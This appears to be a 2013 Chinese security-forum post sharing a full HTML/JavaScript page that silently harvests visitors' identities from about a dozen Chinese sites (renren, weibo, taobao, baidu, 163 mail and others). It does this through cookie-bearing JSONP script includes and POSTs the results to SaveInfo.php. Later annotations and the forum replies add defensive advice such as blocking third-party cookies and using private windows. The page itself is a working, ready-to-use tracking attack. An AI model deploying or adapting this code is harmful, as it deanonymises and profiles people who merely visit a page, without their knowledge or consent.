注意,日站的时候请清理cookie或使用虚拟机,否则可被cookie追踪
追踪代码
<html>
<head>
<title>test</title>
</head>
<body>
<strong>It works</strong>
<script type="text/javascript">
// Identifiers appended to every report that SendDataToServer posts.
// NOTE(review): pid looks like a yyyymmddHHMMSS timestamp and random like a
// per-page nonce, presumably stamped in when the page is generated; the page
// does not say how either value is produced or used server-side.
var pid = 20130906003345;
var random = 60113;
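/**
 * Flattens a value into a crude "{ { key=value }\n ... }" text dump.
 *
 * Non-object values are returned unchanged (not converted to a string).
 * Objects, arrays and null are walked with for...in, so inherited enumerable
 * properties are included; null yields "{  }".
 *
 * Keys and values are concatenated without escaping the "{", "}" and "="
 * delimiters, so the output is a human-readable dump and cannot be parsed
 * back reliably. The recursion has no cycle or depth guard: a
 * self-referencing object recurses until the stack overflows.
 *
 * @param {*} obj - Value to dump.
 * @returns {*} The dump string for objects, otherwise obj itself.
 */
function GetObjString(obj) {
  if (typeof obj !== 'object') {
    return obj;
  }
  var retstr = '{ ';
  // The loop variable is declared locally. The original assigned an
  // undeclared `fld`, which leaks a global in sloppy mode and throws
  // ReferenceError in strict mode or an ES module.
  for (var fld in obj) {
    retstr += '{ ' + fld + '=' + GetObjString(obj[fld]) + " }\n";
  }
  retstr += ' }';
  return retstr;
}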
/**
 * Common sink for every JSONP callback on this page: dumps the object the
 * third-party endpoint handed back, encodes it, and posts it to the
 * collecting server tagged with the numeric source id.
 *
 * The dump is encoded with the legacy escape() function, which leaves
 * characters such as "+" and "/" untouched, so it is not a full
 * application/x-www-form-urlencoded encoding.
 *
 * @param {*} obj - Payload received from a third-party endpoint.
 * @param {number} subject - Numeric id of the site the payload came from.
 */
function ProcessDataInner(obj, subject) {
  SendDataToServer(escape(GetObjString(obj)), subject);
}
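/**
 * Returns an HTTP request object for the current browser.
 *
 * Uses the native XMLHttpRequest when it exists; otherwise falls back to the
 * MSXML ActiveX controls of old Internet Explorer, caching the first ProgID
 * that works on createXHR.activeXString for later calls.
 *
 * Fixes over the original:
 *  - the catch block rethrew on the first failing ProgID, so later ProgIDs
 *    were never tried;
 *  - the versioned ProgIDs lacked the dot before the version number
 *    ("MSXML2.XMLHttp6.0"), so they could never resolve;
 *  - once a ProgID had been cached, the else branch threw
 *    "No XHR object available" instead of reusing it;
 *  - arguments.callee (a TypeError in strict mode) is replaced by the
 *    function's own name.
 *
 * @returns {Object|null} A request object, or null when the environment has
 *   neither XMLHttpRequest nor ActiveXObject.
 * @throws {Error} When ActiveXObject exists but no known ProgID can be created.
 */
function createXHR() {
  if (typeof XMLHttpRequest !== "undefined") {
    return new XMLHttpRequest();
  }
  if (typeof ActiveXObject === "undefined") {
    return null;
  }
  // IE6 and older: probe the MSXML ProgIDs once, newest first.
  if (typeof createXHR.activeXString !== "string") {
    var versions = ["MSXML2.XMLHttp.6.0", "MSXML2.XMLHttp.3.0", "MSXML2.XMLHttp"];
    for (var i = 0; i < versions.length; i++) {
      try {
        var xhr = new ActiveXObject(versions[i]);
        createXHR.activeXString = versions[i];
        return xhr;
      } catch (ex) {
        // This ProgID is not registered; fall through to the next one.
      }
    }
    throw new Error("No XHR object available");
  }
  return new ActiveXObject(createXHR.activeXString);
}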
/**
 * Posts one harvested record back to the page's own origin.
 *
 * This is the exfiltration step of the page: an asynchronous POST to the
 * relative URL "SaveInfo.php" with a form-encoded body carrying the fields
 * data, pid, random and subject. The response is never read. For defenders,
 * that request shape (same-origin POST fired right after a burst of
 * cross-site script includes) is the observable network signature.
 *
 * Does nothing when createXHR() returns null.
 *
 * @param {string} Data - Already-encoded payload; inserted into the body as is.
 * @param {number} subject - Numeric id of the source site; not encoded.
 */
function SendDataToServer(Data, subject) {
  var xhr = createXHR();
  if (xhr == null) {
    return;
  }
  // Completion handler is a deliberate no-op.
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4) {}
  };
  xhr.open("POST", "SaveInfo.php", true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  var fields = [
    'data=' + Data,
    'pid=' + pid,
    'random=' + random,
    'subject=' + subject
  ];
  // The trailing `false` is kept from the original; send() takes one argument.
  xhr.send(fields.join('&'), false);
}
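/**
 * Performs a synchronous HTTP request and returns the response body.
 *
 * Nothing visible on this page calls this helper. The request is blocking
 * (third argument of open() is false), so the page freezes until it
 * completes.
 *
 * Fix over the original: the request object was obtained with
 * `new createXHR()`. When a constructor call returns null, `new` yields a
 * fresh empty object instead, so the null check could never fire and
 * req.open would fail with a TypeError. createXHR is now called as a plain
 * function.
 *
 * @param {string} Url - Target URL; null or '' makes the function return ''.
 * @param {string} [Method] - HTTP method; null or '' defaults to 'GET'.
 * @param {string} [Data] - Request body; when given, the form-urlencoded
 *   Content-Type header is set.
 * @returns {string} The response text, or '' when there is no URL or no
 *   request object.
 */
function GetDataFromServer(Url, Method, Data) {
  var verb = (Method == null || Method == '') ? 'GET' : Method;
  if (Url == null || Url == '') {
    return '';
  }
  var req = createXHR();
  if (req == null) {
    return '';
  }
  req.open(verb, Url, false);
  if (verb == 'POST' || Data != null) {
    req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  }
  req.send(Data);
  return req.responseText;
}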
// JSONP callbacks. Each global function name below is referenced by a
// callback= (or jsoncallback=) parameter in one of the <script src> tags
// further down the page, so the names must stay exactly as written. Every
// callback forwards whatever object the remote endpoint passes in to
// ProcessDataInner together with a numeric source id:
//   1 renren, 2 jingdong, 3 tianya, 4 weibo, 6 vancl, 7 netease_mail,
//   9 mop, 13 taobao_nick, 14 baidu, 15 renren_all, 16 jingdong_history,
//   17 baidu_all
// The ids are not contiguous; the page does not explain the gaps.
// NOTE(review): what each endpoint actually returns is not shown here;
// presumably account details of the logged-in visitor.
function renren(obj) {
ProcessDataInner(obj, 1);
}
function jingdong(obj) {
ProcessDataInner(obj, 2);
}
// Takes two arguments; the first (bl) is ignored and only obj is forwarded.
function tianya(bl, obj) {
ProcessDataInner(obj, 3);
}
function weibo(obj) {
ProcessDataInner(obj, 4);
}
// NOTE(review): the vancl script tag on this page carries no callback
// parameter, and id 6 is also reported by a separate inline script that
// passes getUserName, so this function may never be invoked.
function vancl(obj) {
ProcessDataInner(obj, 6);
}
function netease_mail(obj) {
ProcessDataInner(obj, 7);
}
function mop(obj) {
ProcessDataInner(obj, 9);
}
function taobao_nick(obj) {
ProcessDataInner(obj, 13);
}
function baidu(obj) {
ProcessDataInner(obj, 14);
}
function renren_all(obj) {
ProcessDataInner(obj, 15);
}
function jingdong_history(obj) {
ProcessDataInner(obj, 16);
}
function baidu_all(obj) {
ProcessDataInner(obj, 17);
}
</script>
<!--
  Cross-site script includes. Each tag below asks the browser to fetch a
  third-party URL as a script. The browser attaches whatever cookies the
  visitor already holds for that site, and the response is expected to call
  the function named in the callback parameter, which hands the returned
  object to ProcessDataInner and on to SaveInfo.php. This is the JSONP
  information-leak pattern: an endpoint that returns identity data to any
  page that includes it.

  Defensive notes:
  * Site owners: do not serve account data from script-includable (JSONP)
    endpoints. Return JSON behind a CORS allow-list, or require an
    unguessable per-session token, and mark session cookies SameSite so
    cross-site includes arrive unauthenticated.
  * Visitors: blocking third-party cookies, or browsing from a clean profile
    or private window, removes the cookies these requests depend on.
  * Every URL here is plain http, so the requests and responses are also
    visible to anyone on the network path.

  NOTE(review): the vancl URL has no callback parameter; the inline script
  right after it reads a global named getUserName, presumably defined by that
  response. If the response does not define it, the inline script throws a
  ReferenceError.
-->
<script src="http://base.yx.renren.com/RestAPI?method=api.base.getLoginUser&format=2&callback=renren"></script>
<script src="http://passport.360top.com/call/checkHello?callback=jingdong"></script>
<script src="http://passport.tianya.cn/online/checkuseronline.jsp?callback=tianya"></script>
<script src="http://weibo.com/ajaxlogin.php?fmelogin=1&callback=weibo"></script>
<script src="http://my.vancl.com/user/getusernamebycookie?vancl"></script>
<script>ProcessDataInner(getUserName,6);</script>
<script src="http://mailfriends.mail.163.com/mailfriends/webApi.do?json={"event":"logon"}&callback=netease_mail"></script>
<script src="http://passport.mop.com/common/user-info?callback=mop"></script>
<script src="http://tmm.taobao.com/member/birth_show.do?from=www.tmall.com&callback=taobao_nick"></script>
<script src="http://fm.baidu.com/dev/api/?tn=playlist&format=jsonp&id=1&callback=baidu"></script>
<script src="http://passport.game.renren.com/user/info?callback=renren_all"></script>
<script src="http://my.360buy.com/book/track.action?jsoncallback=jingdong_history"></script>
<script src="http://zhidao.baidu.com/api/loginInfo?callback=baidu_all"></script>
</body>
</html>
你懂的
@核攻击
[原文地址]
相关讨论:
1#
Ivan | 2013-09-08 12:36
搞個快照神馬的……
2#
Hackx7 | 2013-09-08 12:36
好牛逼的样子
3#
无敌L.t.H (:?门安天京北爱我) | 2013-09-08 12:47
拒绝第三方
4#
luom | 2013-09-08 12:49
这尼玛大陷阱啊
5#
Sogili (.) 长短短 () | 2013-09-08 13:29
ctrl+shift+n 打开隐身窗口
6#
liner (/) | 2013-09-08 13:36
7#
猪猪侠 (A) | 2013-09-08 13:43
很好。
8#
xsser (十根阳具有长短!!) | 2013-09-08 14:24
撸主,百度甚至可以取得关键广告,知道你喜好的哈
9#
safe121 (--黑阔娱乐群:328034840) | 2013-09-08 14:30
@xsser 我在想,chrome的Block third-party cookies and site data是否有效。
感觉这个方法是 Cookie Stuffing
10#
一只猿 (恭喜你又中奖了!!) | 2013-09-08 14:38
@xsser 如何拒绝百度获取,有没有好的方法
11#
x7iao (宇宙黑阔。) | 2013-09-08 16:12
撸主 有接收端吗
12#
想要减肥的胖纸 | 2013-09-08 16:29
我又不做违法的事情。为什么会怕追踪呢。
13#
低调 | 2013-09-08 17:07
@xsser 一般网站联盟连男的女的 多大岁数 文化程度 都能分析出来 呵呵
核攻击 | 2013-09-12 10:49
WTF